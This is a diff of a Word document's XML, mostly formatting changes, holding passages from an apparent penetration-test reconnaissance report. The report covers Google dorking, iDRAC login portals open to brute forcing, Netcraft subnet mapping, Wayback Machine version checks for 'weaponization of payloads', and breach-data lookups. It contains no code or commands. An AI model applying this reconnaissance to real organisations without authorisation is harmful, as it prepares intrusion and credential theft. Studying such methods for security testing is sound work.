+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">which </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>can be</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve"> helpful to the </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">engagement. </w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">Figure 2 is a screenshot of the login screen of the Physics database which requires a valid login before any </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">login details can be </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>accessed:</w:t>
       </w:r>
     </w:p>
@@ -2253,7 +2911,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId6"/>
+                    <a:blip r:embed="rId7"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2308,19 +2966,51 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">Figure 3 </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">also showing one of the </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">directories </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">disallowing access to the directory </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">involved in the information leakage here: </w:t>
       </w:r>
     </w:p>
@@ -2348,7 +3038,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId7"/>
+                    <a:blip r:embed="rId8"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2403,234 +3093,518 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
         <w:t xml:space="preserve">There can also be other </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
         <w:t xml:space="preserve">uses of Google dorking such as </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
         <w:t xml:space="preserve">identifying </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
         <w:t xml:space="preserve">available </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
         <w:t>login portals</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
         <w:t xml:space="preserve"> of the </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
         <w:t>target organisation</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
         <w:t xml:space="preserve">, this can also involve </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
         <w:t xml:space="preserve">login portals of </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
         <w:t xml:space="preserve">“iDRAC” devices which are </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
         <w:t xml:space="preserve">commonly </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
         <w:t xml:space="preserve">used </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
         <w:t>within management VLANs</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
         <w:t xml:space="preserve">. </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
         <w:t xml:space="preserve">If these </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
         <w:t>devices are found</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
         <w:t xml:space="preserve">on the internet, this can be a method of leveraging a network with full management access provided the endpoint can be successfully brute forced or passwords </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
         <w:t>are found during the OSINT search.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
       <w:r>
         <w:t>Netcraft</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Netcraft</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> can be used for several purposes. </w:t>
-      </w:r>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Netcraft can be used for several purposes. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">As opposed to making use of </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>vulnerability scanners</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve"> such as Shodan/Censys</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve"> which can be easily blocked by</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>internet facing target devices with IPTables rules</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>.</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>O</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">ne of the </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">approaches which can be taken to </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">gain information </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">in a passive manner </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">is </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">to access a site called </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Netcraft</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">to access a site called Netcraft. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">With this site </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">it is possible to achieve information gathering of </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">target </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>organisation subnet</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">. </w:t>
       </w:r>
-      <w:r>
-        <w:t xml:space="preserve">With this site </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">it is possible to achieve information gathering of </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">target </w:t>
-      </w:r>
-      <w:r>
-        <w:t>organisation subnet</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">With the knowledge of </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>an internet facing device</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">the use of Netcraft can </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">give further information about the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ASN (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Autonomous </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">System </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>N</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>umber</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">which is closely associated to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>BGP (Border Gateway Prot</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ocol) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">and is responsible for </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">providing information </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">such as </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>allocated IP subnets</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">. </w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">With the knowledge of </w:t>
-      </w:r>
-      <w:r>
-        <w:t>an internet facing device</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">the use of </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Netcraft</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> can </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">give further information about the </w:t>
-      </w:r>
-      <w:r>
-        <w:t>ASN (</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Autonomous </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">System </w:t>
-      </w:r>
-      <w:r>
-        <w:t>N</w:t>
-      </w:r>
-      <w:r>
-        <w:t>umber</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">) </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">which is closely associated to </w:t>
-      </w:r>
-      <w:r>
-        <w:t>BGP (Border Gateway Prot</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">ocol) </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">and is responsible for </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">providing information </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">such as </w:t>
-      </w:r>
-      <w:r>
-        <w:t>allocated IP subnets</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>Allocated IP subnets</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve"> which can then be used to </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">map </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">down </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>which IP addresses belong to the target organisation as seen in figure 4.</w:t>
       </w:r>
     </w:p>
@@ -2659,7 +3633,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId8"/>
+                    <a:blip r:embed="rId9"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2892,19 +3866,11 @@
         </w:rPr>
         <w:t xml:space="preserve">. </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>Netcraft</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> is also capable to </w:t>
+        <w:t xml:space="preserve">Netcraft is also capable to </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3076,7 +4042,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId9"/>
+                    <a:blip r:embed="rId10"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3168,7 +4134,7 @@
         </w:rPr>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
-      <w:hyperlink r:id="rId10" w:history="1">
+      <w:hyperlink r:id="rId11" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -3290,22 +4256,19 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
+        <w:t xml:space="preserve"> this information is made available from figure 6</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
         <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:keepNext/>
         <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3327,7 +4290,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11"/>
+                    <a:blip r:embed="rId12"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3350,7 +4313,31 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Figure </w:t>
+      </w:r>
+      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>6</w:t>
+        </w:r>
+      </w:fldSimple>
+      <w:r>
+        <w:t>: Hosting history of target device</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -3361,6 +4348,9 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:keepNext/>
+      </w:pPr>
       <w:r>
         <w:t xml:space="preserve">The Wayback machine </w:t>
       </w:r>
@@ -3429,6 +4419,18 @@
       </w:r>
       <w:r>
         <w:t xml:space="preserve">target page we are using for reconnaissance purposes. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>We can see from this page, the target runs Linux; however for further weaponization of payloads</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, we </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">need to be able to </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">dig deeper and determine the exact version of Linux ensuring any client side attempts do not fail </w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -3453,7 +4455,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId12"/>
+                    <a:blip r:embed="rId13"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3475,7 +4477,28 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Figure </w:t>
+      </w:r>
+      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>7</w:t>
+        </w:r>
+      </w:fldSimple>
+      <w:r>
+        <w:t>: Passive reconnaissance of target domain</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">We </w:t>
       </w:r>
       <w:r>
@@ -3517,7 +4540,6 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Ac</w:t>
       </w:r>
       <w:r>
@@ -3548,7 +4570,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13"/>
+                    <a:blip r:embed="rId14"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3580,7 +4602,13 @@
         <w:t xml:space="preserve">if the </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">systems have been updated they will either be present at this version number or higher but not lower. </w:t>
+        <w:t xml:space="preserve">systems have been </w:t>
+      </w:r>
+      <w:r>
+        <w:t>updated,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> they will either be present at this version number or higher but not lower. </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">This </w:t>
@@ -3616,6 +4644,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
         <w:t>Social Media/</w:t>
@@ -3690,7 +4719,239 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>BreachDirectory</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Once email addresses have been </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">gathered during the passive reconnaissance </w:t>
+      </w:r>
+      <w:r>
